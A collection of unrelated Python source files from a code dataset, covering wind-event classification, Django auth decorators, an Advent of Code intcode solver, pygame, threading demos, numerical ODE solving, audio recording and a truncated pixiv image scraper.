ECDevents = []\n EWSevents = []\n \n print('reading 20Hz data for {}/{}'.format(year,month))\n\n for day in days:\n datapath = os.path.join(metDataPath,str(year),str(month).zfill(2),str(day).zfill(2))\n\n # establish existence of directory\n try:\n fPaths = os.listdir(datapath)\n except:\n continue\n \n if len(fPaths) is 0:\n continue\n \n for filenum, file in enumerate(fPaths):\n \n # load data\n try:\n data = sio.loadmat(os.path.join(datapath,file))\n except:\n continue\n \n # if data is not complete, move on. 
No need to fight here.\n ndat = 10*60*20 # minutes*seconds/minute*samples/second\n if len(data['Sonic_CupEqHorizSpeed_100m'][0][0][0].flatten()) != 12000:\n continue\n \n # make a vector of datetimes for the data\n timerange = MET.make_datetime_vector(file)\n # make a dataframe for the instrument at probeheight\n sonicdat = MET.make_dataframe_for_height(data, timerange, probeheight=probeheight)\n temp = sonicdat['Sonic_CupEqHorizSpeed_100m'].dropna()\n if len(temp)<1000:\n continue\n \n # extract variables needed for classificiation of IEC events\n cupspeed, winddir, sigma_data, params = MET.setup_IEC_params(sonicdat, probeheight=100)\n \n # look for extreme wind speed model events\n Ve01eventfound, Ve50eventfound = MET.find_EWM_events(cupspeed, params)\n Ve01events.extend(Ve01eventfound)\n Ve50events.extend(Ve50eventfound)\n \n # look for extreme operating gust events\n EOGeventfound = MET.find_EOG_events(cupspeed, params)\n EOGevents.extend(EOGeventfound)\n \n # look for extreme turbulence model events\n ETMeventfound = MET.find_ETM_events(cupspeed, sigma_data, params)\n ETMevents.extend(ETMeventfound)\n\n # look for extreme direction change events\n EDCeventfound = MET.find_EDC_events(cupspeed, winddir, params)\n EDCevents.extend(EDCeventfound)\n \n # look Extreme coherent gust with direction change events\n ECDeventfound = MET.find_ECD_events(cupspeed, winddir, params)\n ECDevents.extend(ECDeventfound)\n \n # look Extreme wind shear events\n EWSeventfound = MET.find_EWS_events(cupspeed, params)\n EWSevents.extend(EWSeventfound)\n \n # save the data for each month \n eventlist = {'EWS_Ve01': Ve01events, \n 'EWS_Ve50': Ve50events, \n 'EOG': EOGevents, \n 'ETM': ETMevents, \n 'EDC': EDCevents, \n 'ECD': ECDevents, \n 'EWS': EWSevents} \n \n filename = 'IEC_events_{}_{}.pkl'.format(year,month)\n savefile = os.path.join(savepath,filename)\n with open(savefile, 'wb') as f:\n pkl.dump(eventlist, f, pkl.HIGHEST_PROTOCOL)\n \nprint('done')\n\n\n# demo load data\nloadfile = savefile\n# loadfile = '/Users/nhamilto/Documents/Wake_Dynamics/SiteChar/data/IEC/IEC_events_2015_1.pkl'\nwith open(loadfile, 'rb') as f:\n test= pkl.load(f)\nfor key in test:\n print(len(test[key]))\n\n","sub_path":"scripts/IEC_extreme_events.py","file_name":"IEC_extreme_events.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"242352071","text":"\"\"\"Module containing helper decorators for user authentication.\"\"\"\n\nfrom django.contrib.auth import get_user_model\nfrom functools import wraps\n\nfrom .response import Http400, Http403, Http404, Http500\n\nimport json\n\ndef check_json(func):\n \"\"\"Checks that the request's body has valid JSON, and sets kwargs['json']\n to the serialized data.\"\"\"\n @wraps(func)\n def wrapper(self, request, *args, **kwargs):\n try: # attaches the json to the view instance\n self.json_data = json.loads(request.body.decode('utf-8'))\n except:\n return Http400('Your JSON is invalid')\n return func(self, request, *args, **kwargs)\n return wrapper\n\ndef authenticated(func):\n \"\"\"Makes sure that a user is authenticated to view a post.\"\"\"\n @wraps(func)\n def wrapper(self, request, *args, **kwargs):\n if not request.user.is_authenticated():\n return Http403(\"You are not authenticated\")\n return func(self, request, *args, **kwargs)\n return wrapper\n \n\ndef authenticated_and_authorized(model=None, model_filters=None):\n \"\"\"Checks that a user a authenticated and authorized to edit an 
object\n in a model. Specific filters which are passed into the url parameters\n should bet in a list set into model_filters. This should not be a tuple!.\n \"\"\"\n filters = {}\n if model == None:\n return Http500('An error occured')\n def callable(func):\n @wraps(func)\n def wrapper(self, request, *args, **kwargs):\n if 'username' in model_filters:\n # Check for username in the model_filters\n try:\n model_filters.remove('username')\n except: # This would be an annoying error to debug\n raise Exception(\"You can only pass a list into the \"\n \"model_filters kwarg in the authenticated_and_authorized \"\n \"decorator\")\n # Set the user into the filters\n username = kwargs.get('username')\n try:\n user = get_user_model().objects.get(username=username)\n filters['user'] = user\n except:\n return Http404(\"The user attached to this mode does not \"\n \"exist.\")\n # Add the rest of the model filters\n for model_filter in model_filters:\n filters[model_filter] = kwargs.get(model_filter)\n # Attempt to check that a model attached to the user exists\n if len(model_filters) > 0:\n try:\n obj = model.objects.get(**filters)\n username = obj.user.username\n self.user = obj.user \n # attaches the user to the view instance\n except Exception as e:\n return Http404('This object does not exist')\n else:\n username = kwargs.get('username')\n # Finally check if the attached user is the user logged in\n if request.user.is_authenticated() and \\\n (request.user.username == username):\n return func(self, request, *args, **kwargs)\n else:\n return Http403(\"You are not authorized to edit this object\")\n return wrapper\n return callable \n","sub_path":"BoulderDjangoDev/utils/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"383782871","text":"#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport webapp2\nfrom google.appengine.api import urlfetch\nimport highlighter\nfrom dict_to_protobuf import decode_dictionary\nfrom server.highlighter import highlight\nfrom datastore_entities import PageEntity\nfrom short_url import decode_url\n\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n\n dummy2 = {\"commonPath\": [\n {\"firstClass\": \"device_desktop\", \"firstClassIndex\": 0, \"index\": 0, \"nodeName\": \"body\"},\n {\"firstClass\": \"container\", \"firstClassIndex\": 3, \"id\": \"content\", \"idIndex\": 0, \"index\": 10,\n \"nodeName\": \"div\"},\n {\"firstClass\": \"container\", \"firstClassIndex\": 1, \"index\": 2, \"nodeName\": \"div\"}],\n \"endOffset\": 102, \"endPath\": [\n {\"firstClass\": \"cikk-torzs\", \"firstClassIndex\": 0, \"index\": 3, \"nodeName\": \"div\"},\n {\"index\": 0, \"nodeName\": \"blockquote\"}, {\"index\": 0, \"nodeName\": \"p\"},\n {\"index\": 0, \"nodeName\": \"#text\"}], \"startOffset\": 429, \"startPath\": [\n {\"firstClass\": \"lead\", \"firstClassIndex\": 0, \"index\": 
2, \"nodeName\": \"div\"},\n {\"index\": 0, \"nodeName\": \"#text\"}],\n \"url\": \"http://index.hu/belfold/2015/02/10/kilakoltatas_apolasi_segely_inkasszo_csapda/\"}\n\n # request = highlighter.CreatePageRequest()\n # dict_to_protobuf(dummydata, request)\n request = decode_dictionary(highlighter.CreatePageRequest, dummy2)\n\n (error_string, processed_html, original_http_headers) = highlighter.highlight(request)\n\n if error_string is None:\n self.response.headers = original_http_headers\n self.response.write(processed_html)\n else:\n self.response.write(error_string)\n\n\n # if result.status_code == 200:\n\n\nclass ShortURLHandler(webapp2.RequestHandler):\n def get(self, short_url):\n key = decode_url(short_url)\n page_entity = PageEntity.get_by_id(key)\n self.response.write(page_entity.html)\n\n\n\n\napp = webapp2.WSGIApplication([\n (r'/', MainHandler),\n (r'/(.*)', ShortURLHandler),\n ], debug=True)\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"600810088","text":"import sys\nimport itertools\nimport collections\n\n\ndef val(arr, idx, mode):\n # position mode\n if mode == 0:\n return arr[arr[idx]]\n # intermediate mode\n elif mode == 1:\n return arr[idx]\n raise RuntimeError('xxx')\n\n\ndef process(arr):\n arr = arr[:]\n pc = 0\n length = {1: 4, 2: 4, 3: 2, 4: 2, 5: 3, 6: 3, 7: 4, 8: 4, 99: 0}\n while 1:\n mode, op = divmod(arr[pc], 100)\n m2, m1 = divmod(mode, 10)\n if op == 1:\n arr[arr[pc+3]] = val(arr, pc+1, m1) + val(arr, pc+2, m2)\n elif op == 2:\n arr[arr[pc+3]] = val(arr, pc+1, m1) * val(arr, pc+2, m2)\n elif op == 3:\n x = yield\n if x is None:\n return\n arr[arr[pc+1]] = x\n elif op == 4:\n yield val(arr, pc+1, m1)\n elif op == 5:\n if val(arr, pc+1, m1) != 0:\n pc = val(arr, pc+2, m2)\n continue\n elif op == 6:\n if val(arr, pc+1, m1) == 0:\n pc = val(arr, pc+2, m2)\n continue\n elif op == 7:\n arr[val(arr, pc+3, 1)] = 1 \\\n if val(arr, pc+1, m1) < val(arr, pc+2, m2) \\\n else 0\n elif op == 8:\n arr[val(arr, pc+3, 1)] = 1 \\\n if val(arr, pc+1, m1) == val(arr, pc+2, m2) \\\n else 0\n elif op == 99:\n return\n else:\n raise RuntimeError('yyy')\n pc += length[op]\n\n\ndef sol1(arr):\n m = 0\n\n def call(arg1, arg2):\n vm = process(arr)\n next(vm)\n vm.send(arg1)\n return vm.send(arg2)\n\n for a, b, c, d, e in itertools.permutations([0, 1, 2, 3, 4]):\n r = call(e, call(d, call(c, call(b, call(a, 0)))))\n m = max(m, r)\n return m\n\n\ndef sol2(arr):\n m = 0\n\n def newvm(init):\n vm = process(arr)\n next(vm)\n vm.send(init)\n return vm\n return m\n\n\ndef main():\n data = [int(x) for x in sys.stdin.readline().split(',')]\n print(sol1(data))\n print(sol2(data))\n\n\nmain()\n","sub_path":"adventofcode/2019/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"108819874","text":"import pygame\n\nclass ShipPlayer02():\n\n def __init__(self, ai_settings, screen):\n \"\"\"Inicializa a espaçonave 2 e define sua posição inicial\"\"\"\n\n self.screen = screen\n self.ai_settings = ai_settings\n\n self.image = pygame.image.load('images/ship_green.bmp')\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n\n self.rect.centerx = self.screen_rect.centerx + 200\n self.rect.bottom = self.screen_rect.bottom - 40\n\n self.centerx = float(self.rect.centerx)\n self.centery = float(self.rect.centery)\n\n 
# movement flags\n        self.moving_up_01 = False\n        self.moving_down_01 = False\n        self.moving_right_01 = False\n        self.moving_left_01 = False\n\n    def update(self):\n\n        if self.moving_up_01 and self.rect.top > 400:\n            self.centery -= self.ai_settings.ship_speed_factor_player2\n        if self.moving_down_01 and self.rect.bottom < 500:\n            self.centery += self.ai_settings.ship_speed_factor_player2\n        if self.moving_left_01 and self.rect.left > 400:\n            self.centerx -= self.ai_settings.ship_speed_factor_player2\n        if self.moving_right_01 and self.rect.right < self.screen_rect.right:\n            self.centerx += self.ai_settings.ship_speed_factor_player2\n\n        self.rect.centerx = self.centerx\n        self.rect.centery = self.centery\n\n    def blitme(self):\n\n        self.screen.blit(self.image, self.rect)\n\n    def center_ship_player2(self):\n        \"\"\"Center spaceship 2 on the screen\"\"\"\n        self.centerx = 600\n        self.centery = 460\n","sub_path":"alien_invasion_2/ship_player2.py","file_name":"ship_player2.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"285231305","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 14 12:33:51 2018\n\n@author: hardik\n\"\"\"\nimport numpy as np\nfrom pommerman import agents\nfrom keras.models import load_model\n\nclass RL_learned_agent(agents.BaseAgent):\n    def __init__(self):\n        super().__init__()\n        self.actor_model = load_model('actor_model_RL.h5')\n    \n    def act(self, obs, action_space):\n        \n        def featurize(obs):\n            \n            board = obs['board']\n            \n            # convert board items into bitmaps\n            maps = [board == i for i in range(10)]\n            maps.append(obs['bomb_blast_strength'])\n            maps.append(obs['bomb_life'])\n            \n            # duplicate ammo, blast_strength and can_kick over entire map\n            maps.append(np.full(board.shape, obs['ammo']))\n            maps.append(np.full(board.shape, obs['blast_strength']))\n            maps.append(np.full(board.shape, obs['can_kick']))\n            \n            # add my position as bitmap\n            position = np.zeros(board.shape)\n            position[obs['position']] = 1\n            maps.append(position)\n            \n            # add teammate\n            if obs['teammate'] is not None:\n                maps.append(board == obs['teammate'].value)\n            else:\n                maps.append(np.zeros(board.shape))\n            \n            # add enemies\n            enemies = [board == e.value for e in obs['enemies']]\n            maps.append(np.any(enemies, axis=0))\n            \n            old_state = np.stack(maps, axis=2)\n            \n            augmented_mat = obs['board'].copy()\n            augmented_mat[np.where((obs['board'] == 6) | (obs['board'] == 7) | (obs['board'] == 8))] = 0 # Powerups\n            augmented_mat[np.where(obs['board'] == 2)] = 1 # wooden Wall\n            augmented_mat[np.where(obs['board'] == 0)] = 2 # Passage\n            augmented_mat[np.where(obs['board'] == 5)] = 3 # Fog\n            augmented_mat[np.where((obs['board'] == obs['enemies'][0].value) | (obs['board'] == obs['enemies'][1].value))] = 4 # enemy\n            augmented_mat[np.where(obs['board'] == 1)] = 5 # Rigid Wall\n            augmented_mat[np.where(obs['board'] == obs['teammate'].value)] = 6 # Teammate\n            augmented_mat[np.where(obs['board'] == 3)] = 7 # Bomb\n            augmented_mat[np.where(obs['board'] == 4)] = 8 # Flames\n            augmented_mat[augmented_mat > 8] = 6 # Own value with teammate\n            \n            new_obs_cust = np.concatenate([old_state, augmented_mat.reshape((augmented_mat.shape[0], augmented_mat.shape[1], 1))], axis=-1)\n            \n            return new_obs_cust\n        \n        feat = featurize(obs)\n        probs = self.actor_model.predict(feat[np.newaxis])\n        \n        action = np.argmax(probs)\n        return 
action.item()","sub_path":"pommerman/agents/RL_agent.py","file_name":"RL_agent.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"31999673","text":"# CSC 242-501\r\n# Lab 1\r\n# James Hagle\r\n# Put the names of your collaborator(s) here\r\n\r\ndef printMinMax():\r\n lst = []\r\n while True:\r\n num=eval(input(\"Please enter a number: \"))\r\n if num > 0:\r\n lst.append(num)\r\n else:\r\n break\r\n if lst == []:\r\n print(\"No positive numbers entered\")\r\n else:\r\n lst.sort()\r\n print(\"The maximum is\",lst[-1])\r\n print(\"The minimum is\",lst[0])\r\n \r\n \r\ndef printWordsLines(fname):\r\n infile = open(fname, 'r')\r\n s = infile.readlines()\r\n infile.close()\r\n infile = open(fname, 'r')\r\n t = infile.read()\r\n infile.close()\r\n wrds = t.split()\r\n print(\"The file\",fname,\"contains\",len(s),\"lines and\",len(wrds),\"words\")\r\n","sub_path":"CSC241-Python1/Labs/lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"389422751","text":"import matplotlib.pyplot as plt\nfrom MyTriang import *\n\nT = Triangulation()\n\nT.load_msh(\"anulus.msh\")\n\nTAcc = TriaAccessor(T)\nTIt = TriaIterator(TAcc)\n\nplt.figure()\n\nprint(\"\\n\\tstarting loop:\")\nfor MyIt in TIt:\n X = np.append(TAcc.get_nodes_x(), TAcc.get_nodes_x()[0])\n Y = np.append(TAcc.get_nodes_y(), TAcc.get_nodes_y()[0])\n plt.plot(X, Y)\n\n# plt.show()\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.axes().set_aspect(\"equal\")\nplt.savefig(\"mesh_plot.png\")\n","sub_path":"D7-hands-on/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"53114528","text":"# This program allows the user to approximate a solution to an initial value problem for a differential equation,\r\n# and then works out the analytical solution using integration with an integrating factor.\r\n\r\n# Importing matplot to be able to create graphs of solutions, and math for exponential.\r\nimport matplotlib.pyplot as plt\r\nimport math\r\n\r\n# Here I declare arrays, firstly 'step_sizes' which contains the different step sizes, and then also arrayX and arrayY\r\n# in order to store the resulting x and y values.\r\nstep_sizes = [1,0.2,0.05]\r\n# Do you really need two types of arrays? Perhaps arrayX and arrayY could already be 2d?\r\narrayX = [[],[],[]]\r\narrayY = [[],[],[]]\r\n\r\n# EULER'S METHOD: Here is where the program performs Euler's method. Firstly i use y(0) = -3, to store the initial x\r\n# and y values. The relevant step size is then chosen.\r\nfor i in range(0,3):\r\n x = 0\r\n y = -3\r\n step_size = step_sizes[i]\r\n for i in range(0,int(5/step_size) + 1):\r\n # In this for loop, I append the x and y values to the array, and then I use a mathematical expression on line\r\n # 24 to apply Euler's method. The value x is then increased by the step size.\r\n arrayX[i].append(x)\r\n arrayY[i].append(y)\r\n y += step_size * (x + y/5)\r\n x += step_size\r\n\r\n# The arrays are then segmented at the relevant points, and added to a larger array.\r\n#cutoffsX = [arrayX[:6],arrayX[6:32],arrayX[32:]]\r\n#cutoffsY = [arrayY[:6],arrayY[6:32],arrayY[32:]]\r\n\r\n# ANALYTICAL METHOD: Here is where the program performs the analytical method. 
Working out for the mathematical\r\n# expression on line 46 can be found in the 'Working.txt'.\r\n# perhaps array above could be called EulerArray and this one AnalyticalArray?\r\nrealArrayX = []\r\nrealArrayY = []\r\nfor i in range(0,3):\r\n # Same declarations as in Euler's method.\r\n x = 0\r\n y = -3\r\n step_size = step_sizes[i]\r\n for i in range(0,int(5/step_size) + 1):\r\n # This is the main mathematical loop. The program plugs in the x value into the expression to get the accurate\r\n # answer for the value of y. The step size is then incremented.\r\n realArrayX.append(x)\r\n realArrayY.append(y)\r\n y = (-5 * x) - 25 + (22 * math.exp(x/5))\r\n x += step_size\r\n\r\n# Arrays are segmented again.\r\nrealCutoffsX = [realArrayX[:6],realArrayX[6:32],realArrayX[32:]]\r\nrealCutoffsY = [realArrayY[:6],realArrayY[6:32],realArrayY[32:]]\r\n\r\n# This final for loop is then used to create the graphs.\r\nfor i in range(0,3):\r\n # Using the matplotlib library, I first create the parameters for the graph with .plot (plots coordinates), .axis\r\n # (defines range of axis) and .label (labels the axis). The graphs are then displayed to the user.\r\n plt.plot(arrayX[i], arrayY[i], 'ro', label=\"numerical\")\r\n plt.plot(realCutoffsX[i], realCutoffsY[i], '-', label=\"analytical\")\r\n plt.axis([0,5,-4,10])\r\n plt.xlabel(\"x\")\r\n plt.ylabel(\"y\")\r\n plt.title(\"Numerical vs Analytical Method\")\r\n plt.legend()\r\n plt.show()\r\n","sub_path":"Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"420468613","text":"#operating systems\r\n#semaphores\r\n'''import threading\r\nfrom time import sleep\r\nsem=threading.Semaphore()\r\ndef func1():\r\n\tprint(\"function1 starting\")\r\n\tsem.acquire()\r\n\tfor i in range(1,5):\r\n\t\tprint(\"fucntion1 working in loop\")\r\n\t\tsleep(1)\r\n\tsem.release()\r\n\tprint(\"fucntion1 finsished\")\r\ndef func2():\r\n\tprint(\"function2 starting\")\r\n\twhile not sem.acquire(blocking=False):\r\n\t\tprint(\"function2 no semaphore available\")\r\n\t\tsleep(1)\r\n\telse:\r\n\t\tprint(\"got semaphore\")\r\n\t\tfor i in range(1,5):\r\n\t\t\tprint(\"function2 working \")\r\n\t\t\tsleep(1)\r\n\t\tsem.release()\r\nt1=threading.Thread(target=func1)\r\nt2=threading.Thread(target=func2)\r\nt1.start()\r\nt2.start()\r\nt1.join()\r\nt2.join()\r\nfrom threading import *\r\nclass medicalseat:\r\n\tdef __init__(self,avail_seat):\r\n\t\tself.avail_seat=avail_seat\r\n\t\tself.lock=BoundedSemaphore(2)\r\n\t\tprint(self.lock)\r\n\tdef reserve_seat(self,need_seat):\r\n\t\tself.lock.acquire()\r\n\t\t#two threads will start simultaneous execution since we gave value as 2\r\n\t\t#once atleast one thread comes out from the code within acquire and release\r\n\t\t#other thread i.e 3rd thread cannot access the piece of code between acquire and release\r\n\t\tprint(self.lock._value)\r\n\t\tprint('available seats',self.avail_seat)\r\n\t\tif(self.avail_seat>=need_seat):\r\n\t\t\tname=current_thread().name\r\n\t\t\tprint(\"seat allocated for\",name)\r\n\t\t\tself.avail_seat-=need_seat\r\n\t\telse:\r\n\t\t\tprint('no more 
seats')\r\n\t\tself.lock.release()\r\n\t\t#self.lock.release()\r\n\t\t#self.lock.release()\r\nm=medicalseat(2)\r\nt1=Thread(target=m.reserve_seat,args=(1,),name='rama')\r\nt2=Thread(target=m.reserve_seat,args=(1,),name='devi')\r\nt3=Thread(target=m.reserve_seat,args=(1,),name='kavitha')\r\nt1.start()\r\nt2.start()\r\nt3.start()\r\nt1.join()\r\nt2.join()\r\nt3.join()\t\t\r\n'''\r\n'''\r\nstring='ABCDEFGH'\r\nstring='abcdefgh'\r\n\r\noutput: aaBBgg\r\n\r\nfrom threading import *\r\nimport sys\r\nimport time\r\nimport random\r\nlock=Lock()\r\ndef f1():\r\n s='ABCDEFGH'\r\n for i in range(0,len(s)):\r\n lock.acquire()\r\n print(s[i],end='')\r\n sys.stdout.flush()\r\n time.sleep(int(random.random()*3))\r\n print(s[i],end='')\r\n sys.stdout.flush()\r\n lock.release()\r\n time.sleep(int(random.random()*3))\r\ndef f2():\r\n s='abcdefgh'\r\n for i in range(0,len(s)):\r\n lock.acquire()\r\n print(s[i],end='')\r\n sys.stdout.flush()\r\n time.sleep(int(random.random()*3))\r\n print(s[i],end='')\r\n sys.stdout.flush()\r\n lock.release()\r\n time.sleep(int(random.random()*3))\r\n\r\nt1=Thread(target=f1)\r\nt2=Thread(target=f2)\r\nt1.start()\r\nt2.start()\r\nt1.join()\r\nt2.join() \r\n \r\n\r\nimport time\r\nimport sys\r\nfor i in range(10):\r\n print(i,end='')\r\n sys.stdout.flush()\r\ntime.sleep(1)\r\n\r\n#producer consumer problem\r\nfrom threading import Thread, Lock, Condition\r\nimport time,random\r\nqueue=[]\r\nlock=Lock()\r\n#condition object allows one or more threads to wait until notofied by another thread\r\ncondition=Condition()#wait and notify\r\nclass producer(Thread):\r\n def run(self):\r\n nums=range(5)\r\n global queue\r\n while True:\r\n num=random.choice(nums)\r\n lock.acquire()\r\n queue.append(num)\r\n print('produced',num)\r\n lock.release()\r\n time.sleep(random.random())\r\nclass consumer(Thread):\r\n def run(self):\r\n global queue\r\n while True:\r\n lock.acquire()\r\n if not queue:\r\n print('nothing in queue')\r\n num=queue.pop(0)\r\n print('consumed',num)\r\n lock.release()\r\n time.sleep(random.random())\r\n\r\nproducer().start()\r\nconsumer().start()\r\n\r\n\r\n#condition objects\r\nfrom threading import Thread, Condition\r\nimport time\r\nimport random\r\n\r\nqueue=[]\r\nMAX_NUM=10\r\ncondition=Condition()\r\nclass ProducerThread(Thread):\r\n def run(self):\r\n nums=range(5)\r\n global queue\r\n while True:\r\n condition.acquire()\r\n if len(queue)==MAX_NUM:\r\n print(\"queue is full,producer is waiting\")\r\n condition.wait()\r\n print(\"space in queue,consumer notified the producer\")\r\n num=random.choice(nums)\r\n queue.append(num)\r\n print('produced',num)\r\n condition.notify()\r\n condition.release()\r\n time.sleep(random.random())\r\nclass ConsumerThread(Thread):\r\n def run(self):\r\n global queue\r\n while True:\r\n condition.acquire()\r\n if not queue:\r\n print('queue is empty, consumer is waiting')\r\n condition.wait()\r\n print('producer added something to queue')\r\n num=queue.pop(0)\r\n print('consumed',num)\r\n condition.notify()\r\n condition.release()\r\n time.sleep(random.random())\r\nProducerThread().start()\r\nConsumerThread().start()\r\n\r\n\r\n\r\nimport multiprocessing\r\nimport time\r\nresult=[]\r\ndef sq(mylist):\r\n global result\r\n for num in mylist:\r\n result.append(num*num)\r\n print('result',result)\r\n time.sleep(1)\r\nif __name__=='__main__':\r\n mylist=[1,2,3,4,5,6,7,8,9,10]\r\n p1=multiprocessing.Process(target=sq,args=(mylist,))\r\n p1.start()\r\n p1.join()\r\n print('result',result)\r\n\r\n'''\r\n#import threading\r\nimport 
multiprocessing\r\ndef sq(mylist,result,square_sum):\r\n for index,num in enumerate(mylist):\r\n result[index]=num*num\r\n square_sum.value=sum(result)\r\n print('result',result[:])\r\n print('sum of squares',square_sum.value)\r\nif __name__==\"__main__\":\r\n mylist=[1,2,3,4,5,6,7,8,9,10]\r\n result=multiprocessing.Array('i',10)\r\n square_sum=multiprocessing.Value('i')\r\n p1=multiprocessing.Process(target=sq,args=(mylist,result,square_sum))\r\n p1.start()\r\n p1.join()\r\n print('main process',result[:])\r\n print('sum of squares',square_sum.value)\r\n","sub_path":"SEM 5/Python Application Programming/MS_Teams Files/Unit 3/lock_prod_cons.py","file_name":"lock_prod_cons.py","file_ext":"py","file_size_in_byte":6730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"300463184","text":"import threading\nimport pyaudio\nimport sys\nfrom array import array\nimport numpy as np\n\nclass Record(threading.Thread):\n\t'''Records internal audio and passes data to LAME object'''\n\n\tCHUNK_SIZE = 1024\n\tCHANNELS = 1\n\tRATE = 44100 // 2 # Frequency of output / 2 (it works, idk why); integer division, since PyAudio expects an int rate\n\tFORMAT = pyaudio.paInt16\n\n\tdef __init__(self, l):\n\t\t# Transcoder object\n\t\tself.lame = l\n\n\t\tprint(\"===IGNORE ERROR===\") # PyAudio complains about no JACK server, but still works\n\t\tself.p = pyaudio.PyAudio() # Initialize the PyAudio object\n\t\tprint(\"==================\")\n\n\t\t# Open audio stream\n\t\tself.stream = self.p.open(\n\t\t\tformat=self.FORMAT, \n\t\t\tchannels=self.CHANNELS, \n\t\t\trate=self.RATE, \n\t\t\tinput=True,\n\t\t\tframes_per_buffer=self.CHUNK_SIZE)\n\n\t\tsuper(Record, self).__init__()\n\n\tdef record(self, chunks):\n\t\t'''Record the given number of chunks, each of CHUNK_SIZE frames.\n\t\tReturns data as an array of signed shorts.'''\n\t \t# Array of PCM data values\n\t\tr = array('h') # h = signed short\n\t \n\t \t# Read chunks into array\n\t\tfor i in range(chunks):\n\t\t\td = self.stream.read(self.CHUNK_SIZE)\n\t\t\tdata = array('h', d)\n\t\t\tif sys.byteorder == 'big':\n\t\t\t\tdata.byteswap()\n\t\t\tr.extend(data)\n\n\t\treturn r\n\n\tdef __del__(self):\n\t\t'''Close PyAudio and stream objects.'''\n\t\tself.stream.stop_stream()\n\t\tself.stream.close()\n\t\tself.p.terminate()\n\t \n\tdef run(self, *args, **kwargs):\n\t\t'''Starts recording audio and passing it to LAME transcoder.'''\n\t\twhile True:\n\t\t\td = self.record(500)\n\t\t\td = np.array(d)\n\t\t\tself.lame.add_pcm(d)","sub_path":"Record.py","file_name":"Record.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"67702249","text":"from pixivpy3 import *\nfrom time import sleep\nfrom robobrowser import RoboBrowser\nfrom bs4 import BeautifulSoup\nimport MySQLdb, json, ulid, sys, io, re, os\n\nconnection = MySQLdb.connect(\n host='localhost',\n user='root',\n db='pixiv_image_collect',\n # password='',\n charset='utf8'\n)\n\nf = open(\"./public/client.json\", \"r\")\nclient_info = json.load(f)\nf.close()\n\n# Log in with pixivpy\napi = PixivAPI()\napi.login(client_info[\"pixiv_id\"], client_info[\"password\"])\naapi = AppPixivAPI()\naapi.login(client_info[\"pixiv_id\"], client_info[\"password\"])\n\n# Get the total number of followed users\nself_info = aapi.user_detail(client_info[\"user_id\"])\nfollowing_users_num = self_info.profile.total_follow_users\n\n
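# Added note (not in the original script): the if/else below is ceiling division;\n# an equivalent one-liner is pages = (following_users_num + 47) // 48.\n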
# Get the number of pages in the followed-users list (48 users per page)\nif(following_users_num%48 != 0):\n pages = (following_users_num//48)+1\nelse:\n pages = following_users_num//48\n\n# For stripping HTML tags\np = re.compile(r\"<[^>]*?>\")\n# For removing [jump:1]-style markers\njump = re.compile(r\"\\[jump:.+\\]\")\n# File encoding setting\ncharacter_encoding = 'utf_8'\n\n# Log in the web scraper\npixiv_url = 'https://www.pixiv.net'\nbrowser = RoboBrowser(parser='lxml', history=True)\nbrowser.open('https://accounts.pixiv.net/login')\nform = browser.get_forms('form', class_='')[0]\nform['pixiv_id'] = client_info[\"pixiv_id\"]\nform['password'] = client_info[\"password\"]\nbrowser.submit_form(form)\n\n# Set the URL of the followed-users list page\ntarget_url = 'https://www.pixiv.net/bookmark.php?type=user&rest=show&p='\n\n# Get the user IDs of all followed users\n# 4935\ndel sys.argv[0]\nfollowing_users_id = sys.argv\n\n##### Download process #####\n# Get artist info from each artist ID\nfor user_id in following_users_id:\n\n # Get user info (work counts, artist name)\n user_info_json = aapi.user_detail(int(user_id))\n total_illusts = user_info_json.profile.total_illusts\n total_manga = user_info_json.profile.total_manga\n illustrator_name = user_info_json.user.name\n\n # Get illustration info (fetch up to 300 works for now)\n works_info = api.users_works(int(user_id), page=1, per_page=300)\n\n saving_direcory_path = \"./public/pixiv_images/\"\n if not os.path.exists(saving_direcory_path + str(user_id)):\n os.mkdir(saving_direcory_path + str(user_id))\n else:\n continue\n\n saving_direcory_path += str(user_id)\n\n user_cursor = connection.cursor()\n user_cursor.execute(\n \"INSERT INTO user (user_id, user_name, account_name, saving_direcory) VALUES (%s, %s, %s, %s)\",\n (\n user_id,\n user_info_json.user.name,\n user_info_json.user.account,\n saving_direcory_path\n )\n )\n # connection.commit()\n\n # enumerate() gives 